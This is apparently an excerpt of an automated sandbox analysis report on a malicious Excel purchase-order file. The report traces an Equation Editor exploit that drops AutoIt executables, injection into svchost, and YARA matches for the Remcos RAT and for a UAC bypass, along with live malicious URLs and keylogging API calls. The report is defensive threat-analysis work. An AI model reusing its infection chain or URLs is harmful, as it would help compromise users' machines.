                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.464109574.0000000001D79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: svchost.exe, 0000000F.00000002.463895380.00000000001DC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/S
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://www.msn.com/
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                Source: svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: svchost.exe, 0000000D.00000002.467921215.0000000000184000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netXB
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://contextual.media.net/
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: shuvi.io.url.4.drString found in binary or memory: https://shuvi.io/
                Source: PO-00006799868.xls, 7al0eY.url.4.drString found in binary or memory: https://shuvi.io/7al0eY
                Source: 68730000.0.dr, ~DFF2F9DC4D2772FBCE.TMP.0.drString found in binary or memory: https://shuvi.io/7al0eYyX
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/
                Source: svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
                Source: svchost.exe, 0000000D.00000003.467652223.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: svchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: bhv35FF.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_0022407C
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_0022427A
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012D427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_012D427A
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_0022407C
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_0021003A
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0023CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0023CB26
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012ECB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_012ECB26
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR

                System Summary

                barindex
                Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: This is a third-party compiled AutoIt script.10_2_001B3B4C
                Source: taskhostw.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5b2b7944-a
                Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_6a25fbd7-c
                Source: taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_eebce20b-8
                Source: taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_2f9914ac-8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: This is a third-party compiled AutoIt script.11_2_01263B4C
                Source: name.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_75c37f58-d
                Source: name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_59c41405-a
                Source: name.exe, 00000011.00000002.486104935.0000000001314000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5afa77ec-9
                Source: name.exe, 00000011.00000002.486104935.0000000001314000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_d36cde13-4
                Source: name.exe.10.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_989c10cc-0
                Source: name.exe.10.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_636673e6-7
                Source: taskhostw.exe.9.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c863ee33-e
                Source: taskhostw.exe.9.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_e887e63c-4
                Source: taskhostw[1].exe.9.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dcf847ce-b
                Source: taskhostw[1].exe.9.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_044667a8-4
                Source: PO-00006799868.xlsOLE: Microsoft Excel 2007+
                Source: PO-00006799868.xlsOLE: Microsoft Excel 2007+
                Source: 68730000.0.drOLE: Microsoft Excel 2007+
                Source: 68730000.0.drOLE: Microsoft Excel 2007+
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\7al0eY.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\shuvi.io.urlJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\taskhostw.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,10_2_0021A279
